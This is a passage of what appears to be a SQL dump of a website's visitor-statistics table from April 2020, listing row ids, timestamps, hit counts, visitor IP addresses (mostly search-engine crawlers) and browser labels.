72,1587573497,1,1,0,0,'207.46.13.242','other'),(499673,1587573675,1,1,0,0,'91.209.11.236','other'),(499674,1587573921,1,1,0,0,'66.249.64.24','chrome'),(499675,1587573970,1,1,0,0,'66.249.70.33','chrome'),(499676,1587573987,1,1,0,0,'157.55.39.206','other'),(499677,1587573999,1,1,0,0,'66.249.64.25','chrome'),(499678,1587574587,2,2,0,0,'157.55.39.212','other'),(499679,1587574905,3,3,0,0,'178.154.200.222','other'),(499680,1587575423,1,1,0,0,'207.46.13.34','other'),(499681,1587575767,1,1,0,0,'66.249.64.23','chrome'),(499682,1587576062,1,1,0,0,'157.55.39.206','other'),(499683,1587576081,2,2,0,0,'66.249.64.24','chrome'),(499684,1587576102,1,1,0,0,'213.180.203.16','other'),(499685,1587576325,1,1,0,0,'178.154.200.92','other'),(499686,1587576376,2,2,0,0,'207.46.13.34','other'),(499687,1587576387,2,2,0,0,'195.114.146.186','chrome'),(499688,1587577013,4,4,0,0,'66.249.64.24','chrome'),(499689,1587577358,1,1,0,0,'157.55.39.206','other'),(499690,1587577377,2,2,0,0,'207.46.13.34','other'),(499691,1587577519,2,2,0,0,'157.55.39.212','other'),(499692,1587577539,3,3,0,0,'178.154.200.222','other'),(499693,1587577708,1,1,0,0,'193.106.59.25','firefox'),(499694,1587578052,8,8,0,0,'77.120.98.235','other'),(499695,1587578280,1,1,0,0,'66.249.70.38','chrome'),(499696,1587578499,1,1,0,0,'213.180.203.16','other'),(499697,1587578751,1,0,1,0,'157.55.39.206',''),(499698,1587578773,1,1,0,0,'88.155.140.248','chrome'),(499699,1587578782,1,1,0,0,'66.249.64.25','chrome'),(499700,1587578933,1,1,0,0,'198.50.246.236','chrome'),(499701,1587578941,1,1,0,0,'198.50.246.236','firefox'),(499702,1587579018,2,2,0,0,'207.46.13.34','other'),(499703,1587579129,1,1,0,0,'178.154.200.222','other'),(499704,1587579628,2,2,0,0,'66.249.64.24','chrome'),(499705,1587579953,1,1,0,0,'213.180.203.16','other'),(499706,1587580326,2,2,0,0,'157.55.39.212','other'),(499707,1587581108,1,1,0,0,'66.249.64.23','chrome'),(499708,1587581438,1,1,0,0,'213.180.203.16','other'),(499709,1587581472,1,1,0,0,'8.29.198.27','other'),(499710,1587581480,1,1,0,0,'207.46.13.242','other'),(499711,1587581846,1,1,0,0,'8.29.198.25','other'),(499712,1587582037,1,1,0,0,'157.55.39.206','other'),(499713,1587582318,1,1,0,0,'157.55.39.212','other'),(499714,1587582321,1,1,0,0,'178.154.200.220','other'),(499715,1587582345,1,1,0,0,'66.249.64.23','chrome'),(499716,1587582413,1,1,0,0,'178.154.200.222','other'),(499717,1587582490,1,1,0,0,'213.180.203.17','other'),(499718,1587582571,2,2,0,0,'66.249.64.25','chrome'),(499719,1587582601,1,1,0,0,'207.46.13.34','other'),(499720,1587583195,1,1,0,0,'91.196.178.46','chrome'),(499721,1587583436,1,1,0,0,'66.249.64.23','chrome'),(499722,1587583575,1,1,0,0,'178.154.200.97','other'),(499723,1587584121,1,1,0,0,'213.180.203.81','other'),(499724,1587584443,1,1,0,0,'66.249.64.24','chrome'),(499725,1587584721,2,2,0,0,'66.249.64.25','chrome'),(499726,1587584780,1,1,0,0,'66.249.64.23','chrome'),(499727,1587585052,1,1,0,0,'157.55.39.212','other'),(499728,1587585116,1,1,0,0,'207.46.13.34','other'),(499729,1587585496,1,1,0,0,'207.46.13.242','other'),(499730,1587585884,2,2,0,0,'66.249.64.23','chrome'),(499731,1587586449,3,2,1,0,'157.55.39.212',''),(499732,1587587132,1,1,0,0,'207.46.13.242','other'),(499733,1587587696,1,1,0,0,'66.249.70.38','chrome'),(499734,1587587757,1,1,0,0,'213.180.203.142','other'),(499735,1587587797,1,1,0,0,'178.154.200.75','other'),(499736,1587588197,1,1,0,0,'66.249.64.24','chrome'),(499737,1587588619,1,1,0,0,'213.180.203.81','other'),(499738,1587588666,8,8,0,0,'77.120.98.235','other'),(499739,1587589130,1,1,0,0,'213.180.203.14','other'),(499740,1587589353,1,1,0,0,'178.154.200.75','other'),(499741,1587589420,1,1,0,0,'213.180.203.50','other'),(499742,1587589463,1,1,0,0,'178.154.200.59','other'),(499743,1587589687,1,1,0,0,'213.180.203.155','other'),(499744,1587589905,1,1,0,0,'66.249.64.24','chrome'),(499745,1587590779,1,1,0,0,'213.180.203.77','other'),(499746,1587590893,1,1,0,0,'213.180.203.155','other'),(499747,1587590982,1,1,0,0,'178.154.200.222','other'),(499748,1587591162,2,2,0,0,'66.249.64.24','chrome'),(499749,1587592189,1,1,0,0,'213.180.203.155','other'),(499750,1587592306,1,1,0,0,'8.29.198.27','other'),(499751,1587592321,1,1,0,0,'66.249.64.25','chrome'),(499752,1587592566,1,1,0,0,'66.249.70.36','chrome'),(499753,1587592671,1,1,0,0,'8.29.198.25','other'),(499754,1587592833,1,1,0,0,'185.51.228.243','chrome'),(499755,1587592845,1,1,0,0,'178.154.200.206','other'),(499756,1587592971,1,1,0,0,'213.180.203.81','other'),(499757,1587593037,1,1,0,0,'213.180.203.38','other'),(499758,1587593108,1,1,0,0,'157.55.39.212','other'),(499759,1587593145,1,1,0,0,'66.249.64.24','chrome'),(499760,1587593687,1,1,0,0,'178.154.200.100','other'),(499761,1587593783,1,1,0,0,'66.249.64.25','chrome'),(499762,1587593801,1,1,0,0,'178.154.200.206','other'),(499763,1587594721,2,2,0,0,'66.249.64.23','chrome'),(499764,1587594921,2,2,0,0,'178.154.200.236','other'),(499765,1587594928,3,3,0,0,'66.249.64.25','chrome'),(499766,1587594983,1,1,0,0,'157.55.39.206','other'),(499767,1587595291,1,1,0,0,'207.46.13.242','other'),(499768,1587595856,2,2,0,0,'66.249.64.23','chrome'),(499769,1587596388,1,1,0,0,'178.154.200.91','other'),(499770,1587596391,1,1,0,0,'213.180.203.101','other'),(499771,1587596487,2,2,0,0,'213.180.203.17','other'),(499772,1587596532,2,2,0,0,'213.180.203.77','other'),(499773,1587596747,8,8,0,0,'77.120.98.235','other'),(499774,1587596862,1,1,0,0,'66.249.64.23','chrome'),(499775,1587597196,1,1,0,0,'178.154.200.222','other'),(499776,1587597361,1,1,0,0,'178.154.200.110','other'),(499777,1587597577,1,1,0,0,'66.249.64.25','chrome'),(499778,1587597734,1,1,0,0,'213.180.203.38','other'),(499779,1587597759,1,1,0,0,'178.154.200.216','other'),(499780,1587597952,1,1,0,0,'66.249.64.24','chrome'),(499781,1587598187,1,1,0,0,'66.249.64.23','chrome'),(499782,1587598586,1,1,0,0,'213.180.203.142','other'),(499783,1587598823,1,1,0,0,'178.154.200.220','other'),(499784,1587598826,1,1,0,0,'213.180.203.65','other'),(499785,1587598839,1,1,0,0,'178.154.200.216','other'),(499786,1587598997,1,1,0,0,'157.55.39.212','other'),(499787,1587599051,1,1,0,0,'66.249.64.24','chrome'),(499788,1587599705,1,1,0,0,'62.205.134.182','other'),(499789,1587599906,1,1,0,0,'66.249.64.25','chrome'),(499790,1587599954,1,1,0,0,'213.180.203.189','other'),(499791,1587600091,1,1,0,0,'178.154.200.114','other'),(499792,1587600531,1,1,0,0,'213.180.203.77','other'),(499793,1587600725,1,1,0,0,'213.180.203.50','other'),(499794,1587600809,2,2,0,0,'66.249.64.24','chrome'),(499795,1587601015,5,5,0,0,'188.143.235.92','chrome'),(499796,1587601506,2,2,0,0,'66.249.64.23','chrome'),(499797,1587601758,1,1,0,0,'66.249.64.25','chrome'),(499798,1587601773,1,1,0,0,'66.249.70.38','chrome'),(499799,1587601791,1,1,0,0,'178.154.200.106','other'),(499800,1587602021,1,1,0,0,'157.55.39.212','other'),(499801,1587602256,1,1,0,0,'66.249.64.24','chrome'),(499802,1587602836,1,1,0,0,'178.154.200.92','other'),(499803,1587603138,1,1,0,0,'8.29.198.26','other'),(499804,1587603254,1,1,0,0,'66.249.70.36','chrome'),(499805,1587603495,1,1,0,0,'8.29.198.25','other'),(499806,1587603515,2,2,0,0,'157.55.39.206','other'),(499807,1587603521,1,1,0,0,'157.55.39.212','other'),(499808,1587603576,2,2,0,0,'213.180.203.16','other'),(499809,1587603588,1,0,1,0,'66.249.64.23',''),(499810,1587603739,5,5,0,0,'178.154.200.222','other'),(499811,1587603816,1,1,0,0,'209.59.181.92','other'),(499812,1587603833,1,1,0,0,'66.249.70.38','chrome'),(499813,1587604035,1,1,0,0,'178.171.19.251','chrome'),(499814,1587604957,3,3,0,0,'178.154.200.222','other'),(499815,1587604982,8,8,0,0,'77.120.98.235','other'),(499816,1587605461,2,2,0,0,'178.154.200.220','other'),(499817,1587605944,2,2,0,0,'178.154.200.222','other'),(499818,1587605974,2,2,0,0,'66.249.64.25','chrome'),(499819,1587606034,1,1,0,0,'66.249.64.24','chrome'),(499820,1587606128,1,1,0,0,'157.55.39.212','other'),(499821,1587606917,1,1,0,0,'213.180.203.70','other'),(499822,1587607124,1,1,0,0,'178.154.200.92','other'),(499823,1587607201,1,1,0,0,'66.249.64.24','chrome'),(499824,1587607819,1,1,0,0,'213.180.203.16','other'),(499825,1587607956,3,3,0,0,'66.249.64.25','chrome'),(499826,1587608571,1,1,0,0,'178.165.56.235','chrome'),(499827,1587608919,1,1,0,0,'66.249.64.25','chrome'),(499828,1587608920,3,3,0,0,'178.154.200.222','other'),(499829,1587609439,1,1,0,0,'66.249.70.38','chrome'),(499830,1587609581,3,3,0,0,'213.180.203.16','other'),(499831,1587609849,3,3,0,0,'178.154.200.222','other'),(499832,1587609954,1,1,0,0,'66.249.64.24','chrome'),(499833,1587610802,1,1,0,0,'213.180.203.16','other'),(499834,1587611788,4,4,0,0,'178.154.200.222','other'),(499835,1587611841,1,1,0,0,'157.55.39.206','other'),(499836,1587611874,2,2,0,0,'66.249.64.25','chrome'),(499837,1587612237,2,2,0,0,'66.249.64.23','chrome'),(499838,1587612575,1,1,0,0,'199.127.56.236','chrome'),(499839,1587612816,1,1,0,0,'66.249.64.24','chrome'),(499840,1587612830,1,1,0,0,'34.91.131.31','other'),(499841,1587613489,1,1,0,0,'178.154.200.196','other'),(499842,1587613717,8,8,0,0,'77.120.98.235','other'),(499843,1587613970,1,1,0,0,'8.29.198.27','other'),(499844,1587614192,1,1,0,0,'138.246.253.15','chrome'),(499845,1587614316,1,1,0,0,'66.249.64.24','chrome'),(499846,1587614322,1,1,0,0,'8.29.198.25','other'),(499847,1587614324,2,1,1,0,'157.55.39.206',''),(499848,1587614433,2,2,0,0,'178.154.200.222','other'),(499849,1587614495,1,1,0,0,'66.249.64.23','chrome'),(499850,1587614570,1,1,0,0,'213.180.203.16','other'),(499851,1587615264,1,1,0,0,'66.220.149.39','other'),(499852,1587615329,2,2,0,0,'66.249.64.24','chrome'),(499853,1587615742,1,1,0,0,'207.46.13.34','other'),(499854,1587615899,3,3,0,0,'178.154.200.222','other'),(499855,1587616878,1,1,0,0,'66.249.64.24','chrome'),(499856,1587617026,1,1,0,0,'62.205.134.182','other'),(499857,1587617195,2,2,0,0,'66.249.64.23','chrome'),(499858,1587617383,1,1,0,0,'178.154.200.207','other'),(499859,1587617423,1,1,0,0,'178.154.200.175','other'),(499860,1587617440,1,1,0,0,'178.154.200.225','other'),(499861,1587618229,1,1,0,0,'213.180.203.95','other'),(499862,1587618245,1,1,0,0,'178.154.200.220','other'),(499863,1587618794,2,2,0,0,'207.46.13.34','other'),(499864,1587618798,2,2,0,0,'178.154.200.222','other'),(499865,1587618888,1,1,0,0,'66.249.64.23','chrome'),(499866,1587618889,1,1,0,0,'207.46.13.242','other'),(499867,1587619476,1,1,0,0,'178.154.200.236','other'),(499868,1587619807,1,1,0,0,'66.249.70.38','chrome'),(499869,1587619904,1,1,0,0,'157.55.39.206','other'),(499870,1587620261,1,1,0,0,'13.66.139.0','other'),(499871,1587620464,2,2,0,0,'66.249.64.24','chrome'),(499872,1587620563,3,3,0,0,'66.249.64.23','chrome'),(499873,1587620700,1,0,1,0,'66.249.64.25',''),(499874,1587620894,1,1,0,0,'66.249.64.25','chrome'),(499875,1587620916,1,1,0,0,'91.196.179.61','firefox'),(499876,1587621238,1,1,0,0,'213.180.203.16','other'),(499877,1587621634,2,2,0,0,'178.154.200.222','other'),(499878,1587621871,2,2,0,0,'66.249.64.25','chrome'),(499879,1587622061,1,1,0,0,'157.55.39.206','other'),(499880,1587622159,8,8,0,0,'77.120.98.235','other'),(499881,1587623009,1,1,0,0,'66.249.70.38','chrome'),(499882,1587623483,1,1,0,0,'66.249.70.33','chrome'),(499883,1587624233,2,2,0,0,'178.154.200.222','other'),(499884,1587624799,1,1,0,0,'8.29.198.25','other'),(499885,1587625145,1,1,0,0,'8.29.198.26','other'),(499886,1587625347,1,1,0,0,'66.249.64.25','chrome'),(499887,1587625511,3,3,0,0,'178.154.200.222','other'),(499888,1587626384,1,1,0,0,'66.249.64.25','chrome'),(499889,1587626420,3,3,0,0,'207.46.13.242','other'),(499890,1587626608,2,2,0,0,'157.55.39.212','other'),(499891,1587626611,1,0,1,0,'66.249.64.24',''),(499892,1587626619,2,2,0,0,'157.55.39.206','other'),(499893,1587626628,1,1,0,0,'213.180.203.16','other'),(499894,1587626797,2,1,1,0,'66.249.64.24',''),(499895,1587626915,1,1,0,0,'66.249.64.24','chrome'),(499896,1587627198,1,1,0,0,'91.196.178.66','chrome'),(499897,1587627848,1,0,1,0,'66.249.64.23',''),(499898,1587627857,3,3,0,0,'66.249.64.23','chrome'),(499899,1587628054,1,1,0,0,'46.211.15.45','chrome'),(499900,1587628088,3,3,0,0,'178.154.200.222','other'),(499901,1587628109,1,1,0,0,'91.196.178.179','chrome'),(499902,1587629452,1,1,0,0,'178.154.200.222','other'),(499903,1587629914,1,1,0,0,'207.46.13.34','other'),(499904,1587629922,1,1,0,0,'66.249.64.25','chrome'),(499905,1587630305,1,1,0,0,'213.180.203.16','other'),(499906,1587630433,2,2,0,0,'178.154.200.222','other'),(499907,1587630506,1,1,0,0,'207.46.13.240','other'),(499908,1587630590,8,8,0,0,'77.120.98.235','other'),(499909,1587631059,1,1,0,0,'91.196.178.181','chrome'),(499910,1587631078,1,1,0,0,'66.249.64.23','chrome'),(499911,1587631243,1,1,0,0,'91.196.177.46','chrome'),(499912,1587631811,2,2,0,0,'178.154.200.222','other'),(499913,1587632419,1,1,0,0,'66.249.64.24','chrome'),(499914,1587633169,1,1,0,0,'66.249.64.25','chrome'),(499915,1587633307,3,3,0,0,'178.154.200.222','other'),(499916,1587633322,1,1,0,0,'91.196.178.68','firefox'),(499917,1587633555,1,1,0,0,'178.95.159.205','chrome'),(499918,1587633566,1,1,0,0,'207.46.13.34','other'),(499919,1587634047,1,1,0,0,'213.180.203.16','other'),(499920,1587634296,4,4,0,0,'178.154.200.222','other'),(499921,1587634518,1,1,0,0,'207.46.13.34','other'),(499922,1587634814,1,1,0,0,'34.239.150.12','chrome'),(499923,1587635624,1,1,0,0,'8.29.198.27','other'),(499924,1587635745,5,5,0,0,'178.154.200.222','other'),(499925,1587635974,1,1,0,0,'8.29.198.26','other'),(499926,1587636003,2,2,0,0,'213.180.203.16','other'),(499927,1587636249,1,1,0,0,'173.252.111.7','other'),(499928,1587637021,1,1,0,0,'178.154.200.222','other'),(499929,1587637158,1,1,0,0,'193.110.19.163','chrome'),(499930,1587637286,1,1,0,0,'207.46.13.34','other'),(499931,1587637940,2,2,0,0,'178.154.200.222','other'),(499932,1587638719,1,1,0,0,'207.46.13.34','other'),(499933,1587638848,3,3,0,0,'178.154.200.222','other'),(499934,1587639041,1,1,0,0,'66.249.70.36','chrome'),(499935,1587639062,1,1,0,0,'207.46.13.40','other'),(499936,1587639325,1,1,0,0,'91.196.178.68','firefox'),(499937,1587639334,8,8,0,0,'77.120.98.235','other'),(499938,1587639614,1,1,0,0,'178.154.200.196','other'),(499939,1587639855,1,1,0,0,'66.249.70.38','chrome'),(499940,1587640272,1,1,0,0,'109.74.154.72','chrome'),(499941,1587640368,1,1,0,0,'213.180.203.16','other'),(499942,1587640632,2,2,0,0,'178.154.200.222','other'),(499943,1587641280,2,2,0,0,'213.180.203.16','other'),(499944,1587641555,1,1,0,0,'178.154.200.222','other'),(499945,1587642065,1,1,0,0,'66.249.64.25','chrome'),(499946,1587642276,1,1,0,0,'213.180.203.16','other'),(499947,1587642767,1,1,0,0,'207.46.13.34','other'),(499948,1587642912,1,1,0,0,'185.138.230.41','chrome'),(499949,1587643399,3,3,0,0,'178.154.200.222','other'),(499950,1587643407,1,1,0,0,'66.249.64.25','chrome'),(499951,1587643837,1,1,0,0,'173.252.111.11','other'),(499952,1587643838,1,1,0,0,'173.252.111.12','other'),(499953,1587643845,1,1,0,0,'173.252.111.16','other'),(499954,1587644005,1,1,0,0,'31.43.31.185','chrome'),(499955,1587644414,1,1,0,0,'173.252.111.24','other'),(499956,1587644516,1,1,0,0,'131.220.6.152','chrome'),(499957,1587644692,1,1,0,0,'207.46.13.34','other'),(499958,1587644894,3,3,0,0,'178.154.200.222','other'),(499959,1587645175,2,2,0,0,'157.55.39.212','other'),(499960,1587645316,3,3,0,0,'66.249.64.23','chrome'),(499961,1587645596,1,1,0,0,'157.55.39.206','other'),(499962,1587645884,1,1,0,0,'178.154.200.222','other'),(499963,1587646453,1,1,0,0,'8.29.198.26','other'),(499964,1587646617,1,1,0,0,'207.46.13.34','other'),(499965,1587646801,1,1,0,0,'8.29.198.27','other'),(499966,1587646855,1,1,0,0,'178.92.75.93','chrome'),(499967,1587647329,2,2,0,0,'207.46.13.40','other'),(499968,1587647333,2,2,0,0,'66.249.64.24','chrome'),(499969,1587647359,1,1,0,0,'66.249.64.23','chrome'),(499970,1587647676,1,1,0,0,'66.249.64.25','chrome'),(499971,1587648199,1,1,0,0,'213.180.203.142','other'),(499972,1587648699,2,2,0,0,'91.196.177.15','other'),(499973,1587648993,1,1,0,0,'130.180.210.27','chrome'),(499974,1587649101,1,1,0,0,'178.154.200.222','other'),(499975,1587649129,8,8,0,0,'77.120.98.235','other'),(499976,1587649400,1,1,0,0,'66.249.64.25','chrome'),(499977,1587649661,1,1,0,0,'207.46.13.40','other'),(499978,1587650059,1,1,0,0,'157.55.39.206','other'),(499979,1587650486,1,1,0,0,'82.207.51.18','chrome'),(499980,1587650776,1,1,0,0,'195.10.210.70','chrome'),(499981,1587650798,1,1,0,0,'185.138.230.41','chrome'),(499982,1587651276,1,1,0,0,'66.249.64.25','chrome'),(499983,1587651305,1,1,0,0,'66.249.64.24','chrome'),(499984,1587651310,1,1,0,0,'178.154.200.220','other'),(499985,1587652178,1,1,0,0,'207.46.13.34','other'),(499986,1587652672,1,1,0,0,'66.249.70.38','chrome'),(499987,1587652950,1,1,0,0,'178.154.200.196','other'),(499988,1587653033,1,1,0,0,'66.249.64.25','chrome'),(499989,1587653416,1,1,0,0,'66.249.64.23','chrome'),(499990,1587653877,1,1,0,0,'93.73.160.193','firefox'),(499991,1587654031,1,1,0,0,'173.252.111.9','other'),(499992,1587654042,1,1,0,0,'207.46.13.34','other'),(499993,1587654474,1,1,0,0,'66.249.64.23','chrome'),(499994,1587654723,1,1,0,0,'207.46.13.40','other'),(499995,1587654997,1,1,0,0,'66.249.70.33','chrome'),(499996,1587655216,1,1,0,0,'157.55.39.206','other'),(499997,1587655575,1,1,0,0,'207.46.13.34','other'),(499998,1587655586,1,1,0,0,'66.249.64.23','chrome'),(499999,1587655945,1,1,0,0,'178.154.200.222','other'),(500000,1587656234,1,1,0,0,'91.196.178.74','firefox'),(500001,1587656590,1,1,0,0,'157.55.39.206','other'),(500002,1587657027,1,1,0,0,'178.154.200.97','other'),(500003,1587657086,2,2,0,0,'207.46.13.34','other'),(500004,1587657290,2,2,0,0,'8.29.198.25','other'),(500005,1587657514,1,1,0,0,'213.180.203.122','other'),(500006,1587657525,1,1,0,0,'178.154.200.236','other'),(500007,1587657746,1,1,0,0,'66.249.64.24','chrome'),(500008,1587658071,2,2,0,0,'207.46.13.34','other'),(500009,1587658083,1,1,0,0,'207.46.13.40','other'),(500010,1587658280,8,8,0,0,'77.120.98.235','other'),(500011,1587658600,1,1,0,0,'66.249.70.38','chrome'),(500012,1587659155,1,1,0,0,'66.249.64.25','chrome'),(500013,1587659312,1,1,0,0,'178.154.200.216','other'),(500014,1587659973,1,1,0,0,'157.55.39.206','other'),(500015,1587660041,2,2,0,0,'207.46.13.34','other'),(500016,1587660238,1,1,0,0,'213.180.203.16','other'),(500017,1587660348,1,1,0,0,'66.249.64.24','chrome'),(500018,1587660727,2,2,0,0,'178.154.200.222','other'),(500019,1587661761,1,1,0,0,'66.249.64.24','chrome'),(500020,1587662074,2,2,0,0,'213.180.203.16','other'),(500021,1587663013,1,1,0,0,'178.154.200.222','other'),(500022,1587663052,1,1,0,0,'178.154.200.97','other'),(500023,1587663123,1,1,0,0,'91.196.178.16','chrome'),(500024,1587663224,1,1,0,0,'66.249.64.23','chrome'),(500025,1587663279,2,2,0,0,'178.133.86.130','chrome'),(500026,1587663362,1,1,0,0,'66.249.70.38','chrome'),(500027,1587663391,1,1,0,0,'66.249.64.25','chrome'),(500028,1587664404,1,1,0,0,'178.154.200.222','other'),(500029,1587664432,1,1,0,0,'66.249.64.24','chrome'),(500030,1587664657,1,1,0,0,'178.154.200.220','other'),(500031,1587664702,1,1,0,0,'66.249.64.25','chrome'),(500032,1587665053,1,1,0,0,'91.196.178.16','chrome'),(500033,1587665634,1,1,0,0,'66.249.64.24','chrome'),(500034,1587666458,1,1,0,0,'91.196.178.16','chrome'),(500035,1587666918,8,8,0,0,'77.120.98.235','other'),(500036,1587666931,1,1,0,0,'66.249.64.25','chrome'),(500037,1587667010,1,1,0,0,'88.155.7.95','chrome'),(500038,1587667037,1,1,0,0,'157.55.39.212','other'),(500039,1587667048,1,1,0,0,'213.180.203.16','other'),(500040,1587667357,1,1,0,0,'207.46.13.40','other'),(500041,1587668124,1,1,0,0,'8.29.198.27','other'),(500042,1587668451,1,1,0,0,'8.29.198.25','other'),(500043,1587668564,1,0,1,0,'157.55.39.212',''),(500044,1587669081,1,1,0,0,'51.140.250.213','other'),(500045,1587669148,1,1,0,0,'178.154.200.222','other'),(500046,1587669163,1,0,1,0,'157.55.39.206',''),(500047,1587669306,1,1,0,0,'66.249.64.25','chrome'),(500048,1587669852,1,1,0,0,'66.249.64.23','chrome'),(500049,1587670097,1,1,0,0,'66.249.64.24','chrome'),(500050,1587670211,1,1,0,0,'213.180.203.16','other'),(500051,1587670264,1,1,0,0,'66.249.64.25','chrome'),(500052,1587671182,1,1,0,0,'194.44.228.210','other'),(500053,1587671954,1,1,0,0,'213.180.203.16','other'),(500054,1587672408,1,1,0,0,'157.55.39.212','other'),(500055,1587672910,1,1,0,0,'207.46.13.40','other'),(500056,1587672951,1,1,0,0,'207.46.13.34','other'),(500057,1587673029,1,1,0,0,'178.154.200.196','other'),(500058,1587673165,1,1,0,0,'157.55.39.206','other'),(500059,1587673411,1,1,0,0,'66.249.64.23','chrome'),(500060,1587673612,3,3,0,0,'66.249.64.25','chrome'),(500061,1587674358,1,1,0,0,'66.249.70.36','chrome'),(500062,1587674661,2,2,0,0,'207.46.13.34','other'),(500063,1587675000,2,2,0,0,'66.249.64.25','chrome'),(500064,1587675189,8,8,0,0,'77.120.98.235','other'),(500065,1587675263,1,1,0,0,'157.55.39.206','other'),(500066,1587675465,1,1,0,0,'178.154.200.222','other'),(500067,1587675847,1,1,0,0,'207.46.13.34','other'),(500068,1587676145,2,2,0,0,'66.249.64.24','chrome'),(500069,1587676336,1,1,0,0,'178.154.200.97','other'),(500070,1587676381,1,1,0,0,'66.249.70.38','chrome'),(500071,1587676486,2,2,0,0,'157.55.39.212','other'),(500072,1587676919,1,1,0,0,'91.209.11.236','other'),(500073,1587677253,1,1,0,0,'157.55.39.206','other'),(500074,1587677282,1,1,0,0,'207.46.13.40','other'),(500075,1587677657,1,1,0,0,'66.249.70.38','chrome'),(500076,1587678542,2,2,0,0,'178.154.200.222','other'),(500077,1587678545,1,1,0,0,'213.180.203.16','other'),(500078,1587678855,1,1,0,0,'66.249.70.33','chrome'),(500079,1587678867,54,54,0,0,'173.212.220.26','other'),(500080,1587678888,1,1,0,0,'157.55.39.212','other'),(500081,1587678914,1,1,0,0,'66.249.64.23','chrome'),(500082,1587678953,1,1,0,0,'8.29.198.25','other'),(500083,1587679277,1,1,0,0,'8.29.198.26','other'),(500084,1587679770,55,55,0,0,'173.212.220.26','other'),(500085,1587679891,1,1,0,0,'66.249.64.23','chrome'),(500086,1587680400,1,1,0,0,'207.46.13.40','other'),(500087,1587680690,50,50,0,0,'173.212.220.26','other'),(500088,1587680985,1,1,0,0,'66.249.64.25','chrome'),(500089,1587681065,1,1,0,0,'17.58.101.25','other'),(500090,1587681534,1,1,0,0,'207.46.13.34','other'),(500091,1587681698,61,61,0,0,'173.212.220.26','other'),(500092,1587681939,1,1,0,0,'213.180.203.142','other'),(500093,1587682655,2,2,0,0,'66.249.64.24','chrome'),(500094,1587683094,1,1,0,0,'207.46.13.40','other'),(500095,1587683185,1,1,0,0,'66.249.64.25','chrome'),(500096,1587683736,8,8,0,0,'77.120.98.235','other'),(500097,1587684252,1,1,0,0,'207.46.13.40','other'),(500098,1587684253,1,1,0,0,'157.55.39.206','other'),(500099,1587684667,1,1,0,0,'66.249.64.25','chrome'),(500100,1587685328,2,2,0,0,'178.154.200.222','other'),(500101,1587686032,1,1,0,0,'157.55.39.206','other'),(500102,1587686106,1,1,0,0,'62.205.134.182','other'),(500103,1587686297,1,1,0,0,'66.249.64.23','chrome'),(500104,1587686298,2,2,0,0,'66.249.64.25','chrome'),(500105,1587687186,1,1,0,0,'91.209.11.236','other'),(500106,1587687717,1,1,0,0,'157.55.39.212','other'),(500107,1587687740,1,1,0,0,'66.249.70.38','chrome'),(500108,1587687799,1,1,0,0,'66.249.70.33','chrome'),(500109,1587688125,1,1,0,0,'178.154.200.222','other'),(500110,1587688341,1,1,0,0,'178.154.200.220','other'),(500111,1587689015,1,1,0,0,'157.55.39.212','other'),(500112,1587689547,1,1,0,0,'66.249.64.24','chrome'),(500113,1587689785,1,1,0,0,'8.29.198.26','other'),(500114,1587690101,1,0,1,0,'207.46.13.40',''),(500115,1587690102,1,1,0,0,'8.29.198.25','other'),(500116,1587690460,1,1,0,0,'66.249.64.25','chrome'),(500117,1587691001,1,1,0,0,'66.249.64.23','chrome'),(500118,1587691642,1,1,0,0,'178.154.200.222','other'),(500119,1587692119,1,1,0,0,'66.249.64.25','chrome'),(500120,1587692289,8,8,0,0,'77.120.98.235','other'),(500121,1587692600,2,2,0,0,'213.180.203.16','other'),(500122,1587693002,2,2,0,0,'157.55.39.212','other'),(500123,1587693070,1,1,0,0,'178.154.200.222','other'),(500124,1587693277,1,0,1,0,'157.55.39.206',''),(500125,1587693317,2,1,1,0,'157.55.39.206',''),(500126,1587693366,2,2,0,0,'66.249.64.24','chrome'),(500127,1587693396,1,1,0,0,'66.249.64.23','chrome'),(500128,1587693484,1,1,0,0,'66.249.70.33','chrome'),(500129,1587694314,1,1,0,0,'157.55.39.212','other'),(500130,1587695749,1,1,0,0,'178.154.200.222','other'),(500131,1587696020,1,1,0,0,'91.209.11.236','other'),(500132,1587696587,1,1,0,0,'66.249.70.36','chrome'),(500133,1587696972,1,1,0,0,'66.249.64.23','chrome'),(500134,1587697319,1,1,0,0,'207.46.13.232','other'),(500135,1587697392,1,1,0,0,'209.17.97.50','other'),(500136,1587697598,1,1,0,0,'66.249.64.25','chrome'),(500137,1587698252,1,1,0,0,'66.249.64.24','chrome'),(500138,1587698717,2,2,0,0,'66.249.64.25','chrome'),(500139,1587698749,1,1,0,0,'207.46.13.232','other'),(500140,1587698915,1,1,0,0,'213.180.203.95','other'),(500141,1587699517,1,1,0,0,'157.55.39.206','other'),(500142,1587699539,1,1,0,0,'213.180.203.140','other'),(500143,1587699987,1,1,0,0,'91.196.178.1','chrome'),(500144,1587700339,1,1,0,0,'178.154.200.222','other'),(500145,1587700612,1,1,0,0,'8.29.198.25','other'),(500146,1587700658,2,2,0,0,'31.13.115.12','other'),(500147,1587700660,1,1,0,0,'31.13.115.10','other'),(500148,1587700687,1,1,0,0,'213.180.203.16','other'),(500149,1587700827,8,8,0,0,'77.120.98.235','other'),(500150,1587700934,1,1,0,0,'8.29.198.26','other'),(500151,1587701196,1,1,0,0,'66.249.64.25','chrome'),(500152,1587701255,1,1,0,0,'178.154.200.222','other'),(500153,1587702154,2,2,0,0,'213.180.203.16','other'),(500154,1587702482,1,1,0,0,'178.154.200.236','other'),(500155,1587702502,1,1,0,0,'185.179.190.53','firefox'),(500156,1587702590,1,1,0,0,'178.154.200.87','other'),(500157,1587703025,1,1,0,0,'178.154.200.222','other'),(500158,1587703090,1,1,0,0,'66.249.70.36','chrome'),(500159,1587703114,1,1,0,0,'207.46.13.40','other'),(500160,1587703440,1,1,0,0,'207.46.13.232','other'),(500161,1587703540,1,1,0,0,'62.205.134.182','other'),(500162,1587704014,2,2,0,0,'178.154.200.222','other'),(500163,1587704291,2,2,0,0,'66.249.64.24','chrome'),(500164,1587705205,1,1,0,0,'92.38.136.69','chrome'),(500165,1587705361,1,1,0,0,'91.196.178.16','chrome'),(500166,1587705751,2,2,0,0,'66.249.64.23','chrome'),(500167,1587705813,1,1,0,0,'178.154.200.216','other'),(500168,1587705907,2,2,0,0,'178.154.200.222','other'),(500169,1587706018,1,1,0,0,'207.46.13.34','other'),(500170,1587706281,2,2,0,0,'66.249.70.33','chrome'),(500171,1587706519,1,1,0,0,'91.209.11.236','other'),(500172,1587706713,1,1,0,0,'66.249.64.24','chrome'),(500173,1587706945,1,1,0,0,'66.249.64.23','chrome'),(500174,1587707487,1,1,0,0,'178.154.200.222','other'),(500175,1587707545,1,1,0,0,'207.46.13.232','other'),(500176,1587708138,1,1,0,0,'77.52.189.210','chrome